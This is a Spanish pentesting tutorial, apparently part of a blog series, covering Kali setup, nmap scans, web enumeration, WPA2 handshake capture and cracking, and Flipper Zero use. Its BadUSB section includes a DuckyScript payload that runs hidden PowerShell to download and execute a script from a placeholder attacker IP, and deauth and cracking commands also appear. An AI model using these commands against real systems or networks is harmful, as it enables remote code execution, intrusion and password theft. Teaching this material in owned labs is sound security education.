El Camino del Hacker: Una Serie de 5 Partes
Parte 1: Introduccion → Parte 2: Dominio del Flipper → Parte 3: Fundamentos de Kali → Parte 4: Explotacion → Parte 5: La Auditoria Completa
En las Partes 1 y 2, clonaste tarjetas, analizaste frecuencias de radio y entendiste por que la mayoria de la "seguridad" es teatro. Has visto las vulnerabilidades desde afuera. Ahora entras y las ves desde la perspectiva del atacante.
Kali Linux es la distribucion estandar de la industria para pruebas de penetracion. Viene precargada con mas de 600 herramientas de seguridad. Esto puede parecer abrumador. La mayoria de los tutoriales te lanzan a lo profundo con comandos que no entiendes y sin contexto de por que importan.
Nosotros lo hacemos diferente. Al final de este articulo, tendras un laboratorio funcionando, entenderas el reconocimiento de redes a nivel fundamental y capturaras tu propio handshake WiFi. Cada paso se construye sobre el anterior.
Parte 1: Construyendo Tu Laboratorio
Los pentesters profesionales no ejecutan Kali en su maquina principal. Usan entornos aislados que se pueden reiniciar, capturar en snapshots y destruir sin afectar su sistema principal. Tu haras lo mismo.
Opcion A: Maquina Virtual (Recomendada para Aprender)
Una maquina virtual te da el entorno de aprendizaje mas seguro. Puedes hacer snapshots de tu progreso, cometer errores y revertir al instante.
Lo Que Necesitaras
- Maquina host: 16GB+ RAM, 50GB+ de espacio libre en disco, CPU moderna con soporte de virtualizacion
- Software de virtualizacion: VirtualBox (gratuito) o VMware Workstation Player (gratuito para uso personal)
- Kali Linux: VM oficial preconstruida desde kali.org
Proyecto: Configuracion de la VM de Kali
Tiempo: 30-45 minutos
Pasos:
- Descarga la imagen de la VM de Kali para tu hypervisor (VirtualBox o VMware)
- Extrae el archivo descargado (se recomienda 7-Zip para Windows)
- Importa la VM en tu hypervisor
- Configura los recursos: 4GB de RAM minimo (8GB recomendado), 2+ nucleos de CPU
- Habilita el adaptador de red en modo "Bridged" para acceso completo a la red
- Inicia la VM e inicia sesion con las credenciales por defecto:
kali/kali - Abre la terminal y ejecuta:
sudo apt update && sudo apt full-upgrade -y - Crea un snapshot llamado "Fresh Install" para recuperacion facil
Verificar exito: Puedes abrir una terminal, ejecutar whoami y ver kali.
Opcion B: Hardware Dedicado (Para Practica Seria)
Una vez que te sientas comodo con Kali, el hardware dedicado elimina la sobrecarga de la VM y habilita acceso completo al hardware, lo cual es esencial para pruebas inalambricas.
Recomendaciones de Hardware
| Opcion economica | ThinkPad X230/T430 usado ($100-150), WiFi Intel reemplazado con Atheros AR9285 |
|---|---|
| Opcion moderna | Framework Laptop con modulo WiFi compatible con Linux |
| Sensor dedicado | Raspberry Pi 5 4GB con adaptador externo Alfa AWUS036ACH |
Por ahora, una VM es perfecta. El hardware dedicado se vuelve importante cuando necesitas modo monitor para pruebas inalambricas (cubierto mas adelante en este articulo).
Opcion C: USB Live (Cero Persistencia)
Un USB live ejecuta Kali directamente sin instalacion. Todo desaparece cuando apagas. Util para probar en diferentes hardware, pero perderas tu trabajo cada sesion a menos que crees una particion persistente.
bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcherdd Destruye Datos
El comando dd escribe directamente en el disco sin confirmacion. Verifica tres veces el nombre de tu dispositivo. Escribir en el dispositivo equivocado borrara esa unidad completamente.
Parte 2: La Mentalidad de Terminal
Antes de tocar herramientas de seguridad, necesitas sentirte comodo en la terminal. Esto no es opcional. La GUI existe en Kali, pero el trabajo real sucede en la linea de comandos.
Navegacion Esencial
bash# Know where you are
pwd # Print working directory
# Move around
cd /home/kali # Go to home directory
cd .. # Go up one level
cd - # Go to previous directory
# See what's here
ls # List files
ls -la # List all files with details
ls -lah # Human-readable sizes
# Read files
cat filename # Display entire file
less filename # Scrollable view (q to quit)
head -n 20 filename # First 20 lines
tail -f filename # Follow file in real-time (logs)Escalada de Privilegios
Muchas herramientas de seguridad requieren acceso root. En Kali, sudo te da privilegios root temporales.
bashsudo command # Run single command as root
sudo -i # Start root shell (be careful)
whoami # Check current user
id # Show user and group IDsRoot con Responsabilidad
Ejecutar como root significa sin redes de seguridad. Un error tipografico como rm -rf / destruira todo. Kali moderno previene este comando especifico, pero el principio se mantiene: entiende lo que estas ejecutando antes de ejecutarlo.
Gestion de Procesos
bashps aux # All running processes
top # Real-time process viewer
htop # Better process viewer (install if needed)
# Control processes
ctrl+c # Stop current process
ctrl+z # Suspend process
bg # Resume in background
fg # Bring to foreground
# Kill processes
kill PID # Graceful termination
kill -9 PID # Force kill (last resort)Comandos de Red
baship a # Show network interfaces
ip route # Show routing table
ping -c 4 8.8.8.8 # Test connectivity
curl ifconfig.me # Your public IP
# DNS lookups
nslookup google.com
dig google.comProyecto: Orientacion en la Terminal
Tiempo: 15 minutos
Tareas:
- Encuentra tu direccion IP en la red local usando
ip a - Identifica tu puerta de enlace predeterminada usando
ip route - Haz ping a tu puerta de enlace para confirmar conectividad
- Lista todos los archivos en
/etcordenados por tiempo de modificacion:ls -lt /etc | head - Lee las primeras 50 lineas de
/etc/passwd:head -n 50 /etc/passwd
Objetivo: Deberias poder navegar, verificar el estado de la red y leer archivos sin pensarlo.
Parte 3: Reconocimiento de Redes con Nmap
Nmap (Network Mapper) es la herramienta mas importante que aprenderas. Descubre hosts, identifica servicios, detecta sistemas operativos y mapea la topologia de red. Todo lo demas se construye sobre la salida de nmap.
Tu Primer Escaneo
Vamos a escanear tu propia red. Primero, identifica el rango de tu red:
bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24
# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnetVeras una salida como:
textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)Ese primer escaneo te dice: "Estos dispositivos existen en mi red." Ahora hagamos preguntas mas profundas.
Deteccion de Servicios
Una vez que sabes que hosts existen, quieres saber que servicios estan ejecutando.
bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)Salida comun:
textPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1
80/tcp open http nginx 1.18.0
443/tcp open ssl/http nginx 1.18.0Deteccion de Sistema Operativo
bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1
# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1Entendiendo los Estados de Puertos
Nmap reporta puertos en varios estados:
- open - La aplicacion esta aceptando conexiones activamente. Esto es lo que buscan los atacantes.
- closed - El puerto es accesible pero ninguna aplicacion esta escuchando. El host esta activo pero no hay nada alli.
- filtered - Un firewall o filtro bloquea la sonda. No se puede determinar si esta abierto o cerrado.
- unfiltered - El puerto es accesible pero nmap no puede determinar si esta abierto o cerrado.
Tipos de Escaneo y Sigilo
bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target
# SYN scan (stealthier, default with root)
sudo nmap -sS target
# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target
# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target
# Scan specific ports
sudo nmap -p 22,80,443,8080 target
# Top 1000 common ports (default behavior)
sudo nmap targetMotor de Scripts de Nmap (NSE)
NSE extiende nmap con scripts especializados para deteccion de vulnerabilidades, enumeracion de servicios y mas.
bash# Run default safe scripts
sudo nmap -sC target
# Check for vulnerabilities
sudo nmap --script vuln target
# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target
# HTTP enumeration
sudo nmap --script http-enum target
# List available scripts
ls /usr/share/nmap/scripts/ | head -20Proyecto: Mapea Tu Red
Tiempo: 30 minutos
Prerequisitos: Conocer el rango de tu red desde ip a
- Descubre todos los hosts:
sudo nmap -sn TU_RED/24 - Lista los hosts descubiertos y sus direcciones MAC
- Elige tu router (generalmente .1) y ejecuta:
sudo nmap -sV -sC TU_ROUTER - Identifica todos los puertos abiertos y servicios en tu router
- Ejecuta
sudo nmap -A TU_COMPUTADORApara ver que expone tu propia maquina
Documenta: Crea un archivo de texto listando cada dispositivo, su IP, MAC y servicios. Este es tu mapa de red.
Solo Escanea Redes Que Te Pertenecen
Escanear redes sin autorizacion es ilegal en la mayoria de las jurisdicciones. Incluso un escaneo simple de nmap puede considerarse acceso no autorizado. Limitante a tu propia red, tu propio equipo y redes donde tengas permiso escrito explicito.
Parte 4: Reconocimiento Web
Tu escaneo de nmap probablemente encontro servicios HTTP (puertos 80, 443, 8080). Vamos a entender que se esta ejecutando alli.
Whatweb: Identificacion Rapida de Servicios
bash# Identify web technologies
whatweb http://192.168.1.1Ejemplo de salida:
texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]Nikto: Escaner de Vulnerabilidades Web
bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1
# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentialsEnumeracion de Directorios: Que Esta Oculto?
Los servidores web frecuentemente tienen directorios no enlazados desde la pagina principal: paneles de administracion, archivos de configuracion, archivos de respaldo.
bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txtHallazgos comunes:
text/admin (Status: 301)
/backup (Status: 403)
/config (Status: 200)
/login (Status: 200)Ubicacion de Wordlists
Kali incluye extensas wordlists en /usr/share/wordlists/. Los directorios mas comunes: dirb/, dirbuster/, rockyou.txt (contrasenas) y seclists/ (coleccion completa).
Proyecto: Audita la Interfaz Web de Tu Router
Tiempo: 20 minutos
- Ejecuta
whatweb http://IP_DE_TU_ROUTERpara identificar el servidor - Ejecuta
nikto -h http://IP_DE_TU_ROUTERpara buscar vulnerabilidades - Ejecuta
gobuster dir -u http://IP_DE_TU_ROUTER -w /usr/share/wordlists/dirb/small.txt - Visita cualquier directorio descubierto en un navegador
- Anota cualquier panel de administracion, numeros de version o hallazgos interesantes
Hallazgo comun: Paginas de administracion del router expuestas con credenciales por defecto.
Parte 5: Reconocimiento Inalambrico
Aqui es donde las cosas se ponen interesantes. Las redes WiFi transmiten constantemente, y con las herramientas adecuadas, puedes capturar handshakes de autenticacion: el intercambio cifrado que ocurre cuando un dispositivo se conecta.
Requisitos de Hardware
Tu WiFi integrado probablemente no funcionara para esto. Necesitas un adaptador que soporte modo monitor e inyeccion de paquetes. Recomendados: Alfa AWUS036ACH ($50) o Alfa AWUS036ACM ($45). Estos funcionan directamente con Kali.
Entendiendo el Modo Monitor
El modo WiFi normal ("modo gestionado") solo recibe paquetes dirigidos a tu dispositivo. El modo monitor captura todos los paquetes en rango, el trafico de cada dispositivo en el canal.
bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)
# Kill interfering processes
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0monEscaneando Redes
bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon
# You'll see:
# BSSID = Router MAC address
# PWR = Signal strength (higher = closer)
# CH = Channel
# ENC = Encryption (WPA2, WPA3, OPN)
# ESSID = Network name
# Press Ctrl+C to stopLo que estas viendo es cada red WiFi en rango, sus configuraciones de seguridad, y frecuentemente los dispositivos conectados a ellas. Esto es lo que un war driver ve cuando escanea vecindarios.
Capturando un Handshake
Cuando un dispositivo se conecta a una red WPA2, hay un handshake de cuatro vias. Si capturas este handshake, puedes intentar crackear la contrasena offline.
bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"
# Now wait for a device to connect...
# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshakeCuando capturas un handshake, airodump-ng muestra [ WPA handshake: XX:XX:XX:XX:XX:XX ] en la esquina superior derecha.
Los Ataques Deauth Son Ilegales
Enviar paquetes de deautenticacion a redes que no te pertenecen es un delito federal bajo la Computer Fraud and Abuse Act (en EE.UU.) y leyes similares en otros paises. Solo prueba en tu propia red. El objetivo es entender la vulnerabilidad, no atacar a otros.
Crackeando el Handshake
Con un handshake capturado, puedes intentar crackear la contrasena offline usando una wordlist:
bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]
# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx
# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txtVerificacion de Realidad sobre la Fortaleza de Contrasenas
rockyou.txt contiene mas de 14 millones de contrasenas de filtraciones de datos reales. Si tu contrasena WiFi es "password123" o "verano2024" o el nombre de tu perro, se puede crackear en segundos. Una contrasena aleatoria de mas de 12 caracteres tomaria millones de anos en ser crackeada por fuerza bruta.
Proyecto: Prueba la Seguridad de Tu WiFi
Tiempo: 45 minutos
Prerequisitos: Adaptador WiFi externo con soporte de modo monitor
- Habilita el modo monitor:
sudo airmon-ng start wlan0 - Escanea redes:
sudo airodump-ng wlan0mon - Anota el canal y BSSID de tu propia red
- Captura en tu canal:
sudo airodump-ng -c CHANNEL --bssid TU_BSSID -w miwifi wlan0mon - Reconecta un dispositivo a tu WiFi (o usa deauth en TU red)
- Confirma la captura del handshake
- Prueba contra rockyou.txt:
aircrack-ng -w /usr/share/wordlists/rockyou.txt miwifi-01.cap
Resultado: Si tu contrasena fue encontrada, cambiala inmediatamente a algo aleatorio y largo (mas de 20 caracteres).
Parte 6: Conectando Tu Flipper Zero
Recuerdas todas esas capturas de la Parte 2? Vamos a integrarlas con tu flujo de trabajo en Kali.
Transfiriendo Archivos
bash# Connect Flipper via USB
# It appears as a mass storage device
# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper
# Your captures are in:
/mnt/flipper/subghz/ # Sub-GHz captures
/mnt/flipper/nfc/ # NFC dumps
/mnt/flipper/infrared/ # IR captures
/mnt/flipper/lfrfid/ # 125kHz RFID
/mnt/flipper/badusb/ # BadUSB scriptsAnalizando Dumps NFC
bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk
# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd
# Analyze MIFARE Classic dump
hexdump -C card.mfd | lessAnalisis Sub-GHz
bash# Flipper's .sub files are text-based
cat garage_door.sub
# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information
# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)Desarrollo de BadUSB
Crea payloads BadUSB en Kali, pruebalos en el Flipper:
bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF
# Host the payload from Kali:
python3 -m http.server 8000
# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/Los Payloads BadUSB Son Poderosos
Estos scripts se ejecutan automaticamente al conectarse. Un payload malicioso podria instalar backdoors, robar credenciales o destruir datos en segundos. Solo usalo en tus propias maquinas para pruebas. Nunca dejes tu Flipper donde alguien mas pueda conectarlo.
Parte 7: Documentacion y Flujo de Trabajo
Los pentesters profesionales no solo ejecutan herramientas. Documentan todo. La buena documentacion separa a los aficionados de los profesionales.
Toma de Notas con CherryTree
bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree
# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitationGuardando la Salida de Nmap
bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target
# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml (parseable)
# scan_results.gnmap (greppable)Registro de Sesion
bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log
# Now every command and output is recorded
# Type 'exit' to stop loggingEl Camino del Hacker
Una serie de 5 partes que te lleva de curioso a capaz.
Parte 1: Introduccion Parte 2: Dominio del Flipper Parte 3: Fundamentos de Kali ✓ Parte 4: Explotacion Parte 5: Auditoria Completa
Lista de Verificacion de la Parte 3
☐ Configuracion del Lab: VM de Kali funcionando, actualizada, snapshot guardado
☐ Terminal: Comodo con navegacion, permisos, control de procesos
☐ Nmap: Red mapeada, servicios identificados, router escaneado
☐ Recon Web: Interfaz web del router analizada con whatweb/nikto
☐ Inalambrico: Modo monitor habilitado, redes escaneadas
☐ Handshake: Handshake WiFi propio capturado y probado
☐ Flipper: Archivos transferidos, flujo de trabajo entendido
☐ Documentacion: Notas organizadas, escaneos guardados
Que Sigue
Has construido tu laboratorio y aprendido la fase de reconocimiento. Puedes descubrir hosts, identificar servicios y capturar handshakes inalambricos. Entiendes lo que los atacantes ven cuando miran una red.
En la Parte 4, pasamos del reconocimiento a la explotacion. Aprenderas:
- Metasploit Framework, la navaja suiza de la explotacion
- Flujos de trabajo comunes de explotacion de vulnerabilidades
- Tecnicas de post-explotacion: que sucede despues del acceso inicial
- Escalada de privilegios: de usuario regular a administrador
- Pivoting: usando un sistema comprometido para atacar otros
El reconocimiento te dice donde estan las puertas. La explotacion te ensena como atravesarlas.
Has mapeado el territorio. Ahora aprendes a navegarlo. La Parte 4 te lleva de observador a operador.
Nos vemos en la Parte 4.